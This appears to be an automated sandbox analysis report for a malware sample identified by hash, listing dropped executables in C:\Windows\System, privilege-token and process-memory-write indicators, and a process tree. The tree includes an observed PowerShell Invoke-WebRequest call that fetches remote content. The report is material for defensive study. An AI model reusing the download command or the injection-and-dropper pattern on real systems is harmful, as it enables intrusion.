File created	C:\Windows\System\SUQxJOa.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\TfKWxoT.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\PnzPnrY.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\qoRDYWP.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\RWAQIdf.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\cuMCXaC.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\wEjbKEv.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\WxDDjHi.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\lGwtqSt.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\WyVCXpK.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\jNOLodS.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\hJCxSjY.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\irCzKom.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\niJSIgN.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\MpRWVvi.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\xQoDtuj.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\OxNCLrj.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\IdbLZxc.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\ryNygoz.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\OgwCfgX.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\CWiBQvO.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\BePgWGK.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\ELnNgnS.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\cWgLqCD.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\mzfNVEn.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\xaYqGAk.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\kZXiqwI.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\zzUvWhl.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\wffOLAT.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\MGpGkGc.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\iwvEeSy.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\qZQUmjM.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\AeoYkUY.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\JMOxdht.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\vWhhzpI.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\CXjLxJf.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4084	powershell.exe
4084	powershell.exe
4084	powershell.exe
4084	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
Token: SeLockMemoryPrivilege	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
Token: SeDebugPrivilege	4084	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3428 wrote to memory of 4084	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	86
PID 3428 wrote to memory of 4084	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	86
PID 3428 wrote to memory of 528	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	87
PID 3428 wrote to memory of 528	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	87
PID 3428 wrote to memory of 3024	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	88
PID 3428 wrote to memory of 3024	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	88
PID 3428 wrote to memory of 3100	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	89
PID 3428 wrote to memory of 3100	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	89
PID 3428 wrote to memory of 2312	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	90
PID 3428 wrote to memory of 2312	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	90
PID 3428 wrote to memory of 2844	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	91
PID 3428 wrote to memory of 2844	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	91
PID 3428 wrote to memory of 1676	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	92
PID 3428 wrote to memory of 1676	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	92
PID 3428 wrote to memory of 1108	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	93
PID 3428 wrote to memory of 1108	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	93
PID 3428 wrote to memory of 4196	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	94
PID 3428 wrote to memory of 4196	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	94
PID 3428 wrote to memory of 4876	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	95
PID 3428 wrote to memory of 4876	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	95
PID 3428 wrote to memory of 1328	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	96
PID 3428 wrote to memory of 1328	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	96
PID 3428 wrote to memory of 2596	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	97
PID 3428 wrote to memory of 2596	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	97
PID 3428 wrote to memory of 1036	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	98
PID 3428 wrote to memory of 1036	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	98
PID 3428 wrote to memory of 3780	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	99
PID 3428 wrote to memory of 3780	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	99
PID 3428 wrote to memory of 8	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	100
PID 3428 wrote to memory of 8	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	100
PID 3428 wrote to memory of 1976	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	101
PID 3428 wrote to memory of 1976	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	101
PID 3428 wrote to memory of 1796	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	102
PID 3428 wrote to memory of 1796	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	102
PID 3428 wrote to memory of 512	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	103
PID 3428 wrote to memory of 512	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	103
PID 3428 wrote to memory of 4076	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	104
PID 3428 wrote to memory of 4076	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	104
PID 3428 wrote to memory of 548	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	105
PID 3428 wrote to memory of 548	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	105
PID 3428 wrote to memory of 4404	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	106
PID 3428 wrote to memory of 4404	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	106
PID 3428 wrote to memory of 2092	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	107
PID 3428 wrote to memory of 2092	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	107
PID 3428 wrote to memory of 4840	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	108
PID 3428 wrote to memory of 4840	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	108
PID 3428 wrote to memory of 3224	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	109
PID 3428 wrote to memory of 3224	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	109
PID 3428 wrote to memory of 1856	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	110
PID 3428 wrote to memory of 1856	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	110
PID 3428 wrote to memory of 4416	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	111
PID 3428 wrote to memory of 4416	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	111
PID 3428 wrote to memory of 2452	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	112
PID 3428 wrote to memory of 2452	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	112
PID 3428 wrote to memory of 4900	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	113
PID 3428 wrote to memory of 4900	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	113
PID 3428 wrote to memory of 3236	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	114
PID 3428 wrote to memory of 3236	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	114
PID 3428 wrote to memory of 2264	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	115
PID 3428 wrote to memory of 2264	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	115
PID 3428 wrote to memory of 4848	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	116
PID 3428 wrote to memory of 4848	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	116
PID 3428 wrote to memory of 2084	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	117
PID 3428 wrote to memory of 2084	3428	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe	117

C:\Users\Admin\AppData\Local\Temp\9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
"C:\Users\Admin\AppData\Local\Temp\9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3428
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4084
- C:\Windows\System\objBbrj.exe
  C:\Windows\System\objBbrj.exe
  2⤵
  - Executes dropped EXE
  PID:528
- C:\Windows\System\BMfwdYM.exe
  C:\Windows\System\BMfwdYM.exe
  2⤵
  - Executes dropped EXE
  PID:3024
- C:\Windows\System\QLjteGi.exe
  C:\Windows\System\QLjteGi.exe
  2⤵
  - Executes dropped EXE
  PID:3100
- C:\Windows\System\hcgTrSe.exe
  C:\Windows\System\hcgTrSe.exe
  2⤵
  - Executes dropped EXE
  PID:2312
- C:\Windows\System\sSeUwGN.exe
  C:\Windows\System\sSeUwGN.exe
  2⤵
  - Executes dropped EXE
  PID:2844
- C:\Windows\System\ePvDkop.exe
  C:\Windows\System\ePvDkop.exe
  2⤵
  - Executes dropped EXE
  PID:1676
- C:\Windows\System\WyzRWAQ.exe
  C:\Windows\System\WyzRWAQ.exe
  2⤵
  - Executes dropped EXE
  PID:1108
- C:\Windows\System\cktcuzx.exe
  C:\Windows\System\cktcuzx.exe
  2⤵
  - Executes dropped EXE
  PID:4196
- C:\Windows\System\ykkOFVP.exe
  C:\Windows\System\ykkOFVP.exe
  2⤵
  - Executes dropped EXE
  PID:4876
- C:\Windows\System\WSqPCti.exe
  C:\Windows\System\WSqPCti.exe
  2⤵
  - Executes dropped EXE
  PID:1328
- C:\Windows\System\BbksJtS.exe
  C:\Windows\System\BbksJtS.exe
  2⤵
  - Executes dropped EXE
  PID:2596
- C:\Windows\System\IMivPca.exe
  C:\Windows\System\IMivPca.exe
  2⤵
  - Executes dropped EXE
  PID:1036
- C:\Windows\System\IShGwrS.exe
  C:\Windows\System\IShGwrS.exe
  2⤵
  - Executes dropped EXE
  PID:3780
- C:\Windows\System\vzkqtMD.exe
  C:\Windows\System\vzkqtMD.exe
  2⤵
  - Executes dropped EXE
  PID:8
- C:\Windows\System\fkmXhYS.exe
  C:\Windows\System\fkmXhYS.exe
  2⤵
  - Executes dropped EXE
  PID:1976
- C:\Windows\System\odmLDbj.exe
  C:\Windows\System\odmLDbj.exe
  2⤵
  - Executes dropped EXE
  PID:1796
- C:\Windows\System\QtFrpIc.exe
  C:\Windows\System\QtFrpIc.exe
  2⤵
  - Executes dropped EXE
  PID:512
- C:\Windows\System\uaRcQhL.exe
  C:\Windows\System\uaRcQhL.exe
  2⤵
  - Executes dropped EXE
  PID:4076
- C:\Windows\System\UHfqfYP.exe
  C:\Windows\System\UHfqfYP.exe
  2⤵
  - Executes dropped EXE
  PID:548
- C:\Windows\System\dteyRco.exe
  C:\Windows\System\dteyRco.exe
  2⤵
  - Executes dropped EXE
  PID:4404
- C:\Windows\System\dJhVmPq.exe
  C:\Windows\System\dJhVmPq.exe
  2⤵
  - Executes dropped EXE
  PID:2092
- C:\Windows\System\pooWlbA.exe
  C:\Windows\System\pooWlbA.exe
  2⤵
  - Executes dropped EXE
  PID:4840
- C:\Windows\System\vXCLXvP.exe
  C:\Windows\System\vXCLXvP.exe
  2⤵
  - Executes dropped EXE
  PID:3224
- C:\Windows\System\ZZEOomo.exe
  C:\Windows\System\ZZEOomo.exe
  2⤵
  - Executes dropped EXE
  PID:1856
- C:\Windows\System\EUoaXVq.exe
  C:\Windows\System\EUoaXVq.exe
  2⤵
  - Executes dropped EXE
  PID:4416
- C:\Windows\System\fkpYAOE.exe
  C:\Windows\System\fkpYAOE.exe
  2⤵
  - Executes dropped EXE
  PID:2452
- C:\Windows\System\VWNafDp.exe
  C:\Windows\System\VWNafDp.exe
  2⤵
  - Executes dropped EXE
  PID:4900
- C:\Windows\System\UTlqqVU.exe
  C:\Windows\System\UTlqqVU.exe
  2⤵
  - Executes dropped EXE
  PID:3236
- C:\Windows\System\WxDDjHi.exe
  C:\Windows\System\WxDDjHi.exe
  2⤵
  - Executes dropped EXE
  PID:2264
- C:\Windows\System\SHOdjED.exe
  C:\Windows\System\SHOdjED.exe
  2⤵
  - Executes dropped EXE
  PID:4848
- C:\Windows\System\vhNDTRF.exe
  C:\Windows\System\vhNDTRF.exe
  2⤵
  - Executes dropped EXE
  PID:2084
- C:\Windows\System\lhpPjvs.exe
  C:\Windows\System\lhpPjvs.exe
  2⤵
  - Executes dropped EXE
  PID:4972
- C:\Windows\System\pAMsiAM.exe
  C:\Windows\System\pAMsiAM.exe
  2⤵
  - Executes dropped EXE
  PID:2224
- C:\Windows\System\GUiTWje.exe
  C:\Windows\System\GUiTWje.exe
  2⤵
  - Executes dropped EXE
  PID:2676
- C:\Windows\System\ZRPmNVD.exe
  C:\Windows\System\ZRPmNVD.exe
  2⤵
  - Executes dropped EXE
  PID:3700
- C:\Windows\System\MaxzBwe.exe
  C:\Windows\System\MaxzBwe.exe
  2⤵
  - Executes dropped EXE
  PID:3404
- C:\Windows\System\pxmCCuX.exe
  C:\Windows\System\pxmCCuX.exe
  2⤵
  - Executes dropped EXE
  PID:1932
- C:\Windows\System\tqKnTBd.exe
  C:\Windows\System\tqKnTBd.exe
  2⤵
  - Executes dropped EXE
  PID:724
- C:\Windows\System\ZSMvqrr.exe
  C:\Windows\System\ZSMvqrr.exe
  2⤵
  - Executes dropped EXE
  PID:3988
- C:\Windows\System\iytHGSA.exe
  C:\Windows\System\iytHGSA.exe
  2⤵
  - Executes dropped EXE
  PID:3172
- C:\Windows\System\ynWKvAd.exe
  C:\Windows\System\ynWKvAd.exe
  2⤵
  - Executes dropped EXE
  PID:2132
- C:\Windows\System\aleaAPA.exe
  C:\Windows\System\aleaAPA.exe
  2⤵
  - Executes dropped EXE
  PID:4828
- C:\Windows\System\KrdEBRF.exe
  C:\Windows\System\KrdEBRF.exe
  2⤵
  - Executes dropped EXE
  PID:4668
- C:\Windows\System\XumlJYd.exe
  C:\Windows\System\XumlJYd.exe
  2⤵
  - Executes dropped EXE
  PID:4588
- C:\Windows\System\XlrJatt.exe
  C:\Windows\System\XlrJatt.exe
  2⤵
  - Executes dropped EXE
  PID:3980
- C:\Windows\System\MtvEGCh.exe
  C:\Windows\System\MtvEGCh.exe
  2⤵
  - Executes dropped EXE
  PID:1500
- C:\Windows\System\wQGUPEM.exe
  C:\Windows\System\wQGUPEM.exe
  2⤵
  - Executes dropped EXE
  PID:4700
- C:\Windows\System\OVTMCsN.exe
  C:\Windows\System\OVTMCsN.exe
  2⤵
  - Executes dropped EXE
  PID:1172
- C:\Windows\System\UmJjvKq.exe
  C:\Windows\System\UmJjvKq.exe
  2⤵
  - Executes dropped EXE
  PID:4488
- C:\Windows\System\NxxrrZj.exe
  C:\Windows\System\NxxrrZj.exe
  2⤵
  - Executes dropped EXE
  PID:4396
- C:\Windows\System\fdGJchj.exe
  C:\Windows\System\fdGJchj.exe
  2⤵
  - Executes dropped EXE
  PID:5012
- C:\Windows\System\nMcImNt.exe
  C:\Windows\System\nMcImNt.exe
  2⤵
  - Executes dropped EXE
  PID:4276
- C:\Windows\System\vzJWtFB.exe
  C:\Windows\System\vzJWtFB.exe
  2⤵
  - Executes dropped EXE
  PID:3152
- C:\Windows\System\DjnqaHJ.exe
  C:\Windows\System\DjnqaHJ.exe
  2⤵
  - Executes dropped EXE
  PID:2984
- C:\Windows\System\pGqEaTm.exe
  C:\Windows\System\pGqEaTm.exe
  2⤵
  - Executes dropped EXE
  PID:3976
- C:\Windows\System\BNZzqeN.exe
  C:\Windows\System\BNZzqeN.exe
  2⤵
  - Executes dropped EXE
  PID:1912
- C:\Windows\System\hnkQCwP.exe
  C:\Windows\System\hnkQCwP.exe
  2⤵
  - Executes dropped EXE
  PID:1028
- C:\Windows\System\bjyBRBv.exe
  C:\Windows\System\bjyBRBv.exe
  2⤵
  - Executes dropped EXE
  PID:2384
- C:\Windows\System\WBJkrwF.exe
  C:\Windows\System\WBJkrwF.exe
  2⤵
  - Executes dropped EXE
  PID:436
- C:\Windows\System\cpMeMna.exe
  C:\Windows\System\cpMeMna.exe
  2⤵
  - Executes dropped EXE
  PID:1524
- C:\Windows\System\ObTqyls.exe
  C:\Windows\System\ObTqyls.exe
  2⤵
  - Executes dropped EXE
  PID:4744
- C:\Windows\System\SEFPGvK.exe
  C:\Windows\System\SEFPGvK.exe
  2⤵
  - Executes dropped EXE
  PID:1680
- C:\Windows\System\itIxaos.exe
  C:\Windows\System\itIxaos.exe
  2⤵
  - Executes dropped EXE
  PID:2896
- C:\Windows\System\pdatKik.exe
  C:\Windows\System\pdatKik.exe
  2⤵
  - Executes dropped EXE
  PID:2952
- C:\Windows\System\dyVRnSk.exe
  C:\Windows\System\dyVRnSk.exe
  2⤵
  PID:3308
- C:\Windows\System\zudwXsR.exe
  C:\Windows\System\zudwXsR.exe
  2⤵
  PID:2732
- C:\Windows\System\bCryHvt.exe
  C:\Windows\System\bCryHvt.exe
  2⤵
  PID:808
- C:\Windows\System\IlmKscc.exe
  C:\Windows\System\IlmKscc.exe
  2⤵
  PID:764
- C:\Windows\System\xrMVPwx.exe
  C:\Windows\System\xrMVPwx.exe
  2⤵
  PID:3968
- C:\Windows\System\qqCtDsN.exe
  C:\Windows\System\qqCtDsN.exe
  2⤵
  PID:1288
- C:\Windows\System\aWcWLnD.exe
  C:\Windows\System\aWcWLnD.exe
  2⤵
  PID:896
- C:\Windows\System\rDmYMOW.exe
  C:\Windows\System\rDmYMOW.exe
  2⤵
  PID:4456
- C:\Windows\System\isVeLfQ.exe
  C:\Windows\System\isVeLfQ.exe
  2⤵
  PID:3872
- C:\Windows\System\LQrYGoo.exe
  C:\Windows\System\LQrYGoo.exe
  2⤵
  PID:4328
- C:\Windows\System\eEcrwad.exe
  C:\Windows\System\eEcrwad.exe
  2⤵
  PID:2856
- C:\Windows\System\msOhvYr.exe
  C:\Windows\System\msOhvYr.exe
  2⤵
  PID:316
- C:\Windows\System\qTYhbUx.exe
  C:\Windows\System\qTYhbUx.exe
  2⤵
  PID:3028
- C:\Windows\System\NGMOqre.exe
  C:\Windows\System\NGMOqre.exe
  2⤵
  PID:1132
- C:\Windows\System\UUbanBD.exe
  C:\Windows\System\UUbanBD.exe
  2⤵
  PID:2752
- C:\Windows\System\XYoQxUy.exe
  C:\Windows\System\XYoQxUy.exe
  2⤵
  PID:4768
- C:\Windows\System\kigTDxx.exe
  C:\Windows\System\kigTDxx.exe
  2⤵
  PID:1540
- C:\Windows\System\mXekGVC.exe
  C:\Windows\System\mXekGVC.exe
  2⤵
  PID:3632
- C:\Windows\System\OqKhOmm.exe
  C:\Windows\System\OqKhOmm.exe
  2⤵
  PID:856
- C:\Windows\System\FqEbyvf.exe
  C:\Windows\System\FqEbyvf.exe
  2⤵
  PID:4132
- C:\Windows\System\eDVGcHj.exe
  C:\Windows\System\eDVGcHj.exe
  2⤵
  PID:2532
- C:\Windows\System\cWgLqCD.exe
  C:\Windows\System\cWgLqCD.exe
  2⤵
  PID:2716
- C:\Windows\System\LbVZjea.exe
  C:\Windows\System\LbVZjea.exe
  2⤵
  PID:3160
- C:\Windows\System\SXtznVP.exe
  C:\Windows\System\SXtznVP.exe
  2⤵
  PID:2476
- C:\Windows\System\sXfLksv.exe
  C:\Windows\System\sXfLksv.exe
  2⤵
  PID:3316
- C:\Windows\System\biMTNua.exe
  C:\Windows\System\biMTNua.exe
  2⤵
  PID:3948
- C:\Windows\System\RyFCrlI.exe
  C:\Windows\System\RyFCrlI.exe
  2⤵
  PID:3044
- C:\Windows\System\eeoMkkd.exe
  C:\Windows\System\eeoMkkd.exe
  2⤵
  PID:1408
- C:\Windows\System\JRbafqE.exe
  C:\Windows\System\JRbafqE.exe
  2⤵
  PID:3620
- C:\Windows\System\kFlLWTv.exe
  C:\Windows\System\kFlLWTv.exe
  2⤵
  PID:4740
- C:\Windows\System\zncOyFO.exe
  C:\Windows\System\zncOyFO.exe
  2⤵
  PID:4264
- C:\Windows\System\puaqzHR.exe
  C:\Windows\System\puaqzHR.exe
  2⤵
  PID:1940
- C:\Windows\System\iYfBIpn.exe
  C:\Windows\System\iYfBIpn.exe
  2⤵
  PID:2040
- C:\Windows\System\uKeluQG.exe
  C:\Windows\System\uKeluQG.exe
  2⤵
  PID:228
- C:\Windows\System\dvOJNsp.exe
  C:\Windows\System\dvOJNsp.exe
  2⤵
  PID:5128
- C:\Windows\System\zxkTwWt.exe
  C:\Windows\System\zxkTwWt.exe
  2⤵
  PID:5164
- C:\Windows\System\pLMbGeQ.exe
  C:\Windows\System\pLMbGeQ.exe
  2⤵
  PID:5184
- C:\Windows\System\JHqRAIz.exe
  C:\Windows\System\JHqRAIz.exe
  2⤵
  PID:5200
- C:\Windows\System\vWXLnMF.exe
  C:\Windows\System\vWXLnMF.exe
  2⤵
  PID:5244
- C:\Windows\System\PZnCrug.exe
  C:\Windows\System\PZnCrug.exe
  2⤵
  PID:5264
- C:\Windows\System\gXOGFEq.exe
  C:\Windows\System\gXOGFEq.exe
  2⤵
  PID:5284
- C:\Windows\System\HdYPAEv.exe
  C:\Windows\System\HdYPAEv.exe
  2⤵
  PID:5300
- C:\Windows\System\SthHlRG.exe
  C:\Windows\System\SthHlRG.exe
  2⤵
  PID:5328
- C:\Windows\System\DKRakpq.exe
  C:\Windows\System\DKRakpq.exe
  2⤵
  PID:5344
- C:\Windows\System\iiBlYlv.exe
  C:\Windows\System\iiBlYlv.exe
  2⤵
  PID:5368
- C:\Windows\System\xOGozXv.exe
  C:\Windows\System\xOGozXv.exe
  2⤵
  PID:5396
- C:\Windows\System\NGEVqpO.exe
  C:\Windows\System\NGEVqpO.exe
  2⤵
  PID:5412
- C:\Windows\System\pCNQgky.exe
  C:\Windows\System\pCNQgky.exe
  2⤵
  PID:5432
- C:\Windows\System\AkGLObR.exe
  C:\Windows\System\AkGLObR.exe
  2⤵
  PID:5452
